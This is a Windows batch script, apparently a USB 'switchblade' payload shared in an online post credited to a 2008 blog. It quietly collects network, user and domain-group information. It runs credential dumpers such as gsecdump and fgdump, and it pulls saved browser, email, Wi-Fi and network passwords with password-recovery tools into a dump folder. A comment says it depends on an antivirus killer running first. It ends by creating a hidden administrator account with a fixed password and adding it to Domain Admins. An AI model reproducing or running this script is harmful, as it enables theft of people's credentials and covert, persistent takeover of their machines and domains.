Got the link for this from: http://synjunkie.blogspot.com/2008/03/basic-dos-foo.html
::start of file
@echo off
::create the directory with a computer name for the system and move there
if not exist \switchblade\dump md \switchblade\dump >nul
if not exist \switchblade\dump\%computername% md \switchblade\dump\%computername% >nul
cd \switchblade\tools\ >nul
::create netdump.txt with all the information that the dos command net.exe will extract
echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
ipconfig /all >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
route print >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
ipconfig /displaydns >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
netstat -anbv >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
netsh diag show all /v >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
netsh firewall show conf >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
netsh firewall show port >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
arp -a >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
net session >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
::user info creation
echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
net view >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
net share >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
net accounts >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
net localgroup >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
net localgroup /domain >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
net localgroup administrators /domain >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
net group "domain admins" /domain >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
net group "backup operators" /domain >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
net group "domain users" /domain >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
gpresult >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
.\whosthere.exe >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
.\whosthere-alt.exe >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
.\gsecdump.exe -a >> \switchblade\dump\%computername%\%computername%-user 2>&1
::dump other PC info
echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \switchblade\dump\%computername%\%computername%-PC.log 2>&1
net start >> \switchblade\dump\%computername%\%computername%-PC.log 2>&1
set >> \switchblade\dump\%computername%\%computername%-PC.log 2>&1
tree /f >> \switchblade\dump\%computername%\%computername%-PC.log 2>&1
::slurp Browser info
echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \switchblade\dump\%computername%\%computername%_browser.log 2>&1
cscript //nologo .\iehistquick.vbs >> \switchblade\dump\%computername%\%computername%_browser.log 2>&1
IF EXIST "C:\Program Files\Mozilla Firefox\firefox.exe" .\FirePassword.exe >> \switchblade\dump\%computername%\%computername%_browser.log 2>&1
echo ***********[End Of File]************ >> \switchblade\dump\%computername%\%computername%_browser.log 2>&1
::create the nirsoft tools html files, some of them are known hacktools and will crash out script depends on your AV killer to run first
nircmd.exe exec2 hide "\switchblade\dump\%computername%" "\switchblade\tools\fgdump.exe" -s -r -k
nircmd.exe execmd mylastsearch.exe /shtml "\switchblade\dump\~$sys.computername$\InternetSearch.html"
nircmd.exe execmd pspv.exe /shtml "\switchblade\dump\~$sys.computername$\IEPassword.html"
nircmd.exe execmd iepv.exe /shtml "\switchblade\dump\~$sys.computername$\IEProtected.html"
nircmd.exe execmd nk2view.exe /shtml "\switchblade\dump\~$sys.computername$\recentEmail.html"
nircmd.exe execmd recentfilesview.exe /shtml "\switchblade\dump\~$sys.computername$\recentfiles.html"
IF EXIST "C:\Program Files\Mozilla Firefox\firefox.exe" nircmd.exe execmd passwordfox.exe /shtml "\switchblade\dump\~$sys.computername$\FFPassword.html"
nircmd.exe execmd USBDeview.exe /shtml "\switchblade\dump\~$sys.computername$\USB.html"
nircmd.exe execmd mspassSLURP.exe /shtml "\switchblade\dump\~$sys.computername$\msn.html"
nircmd.exe execmd netpass.exe /shtml "\switchblade\dump\~$sys.computername$\netpassword.html"
nircmd.exe execmd iehv.exe /shtml "\switchblade\dump\~$sys.computername$\IEhistory.html"
nircmd.exe execmd ProduKey.exe /shtml "\switchblade\dump\~$sys.computername$\keys.html"
nircmd.exe execmd MozillaHistoryView.exe /shtml "\switchblade\dump\~$sys.computername$\FFXHistory.html"
nircmd.exe execmd WirelessKeyView.exe /shtml "\switchblade\dump\~$sys.computername$\Wireless.html"
nircmd.exe execmd mailpv.exe /shtml "\switchblade\dump\~$sys.computername$\mail.html"
nircmd.exe execmd mzcv.exe /shtml "\switchblade\dump\~$sys.computername$\FFXCookie.html"
nircmd.exe execmd cports.exe /shtml "\switchblade\dump\~$sys.computername$\OpenPorts.html"
nircmd.exe execmd chromepass.exe /shtml "\switchblade\dump\~$sys.computername$\ChromePass.html"
nircmd.exe execmd chromecacheview.exe /shtml "\switchblade\dump\~$sys.computername$\ChromePass.html"
nircmd.exe execmd OpenedFilesView.exe /shtml "\switchblade\dump\~$sys.computername$\openfiles.html"
nircmd.exe execmd wul.exe /shtml "\switchblade\dump\~$sys.computername$\updates-bugfixes.html"
nircmd.exe execmd dialupass2.exe /shtml "\switchblade\dump\~$sys.computername$\DialUp2.html"
::finally if we didnt get caught
net user helpdeskadmin Password!@#$ /add
net localgroup Administrators helpdeskadmin /add
net group "domain admins" helpdeskadmin /add
exit
mubix
commented
10 years ago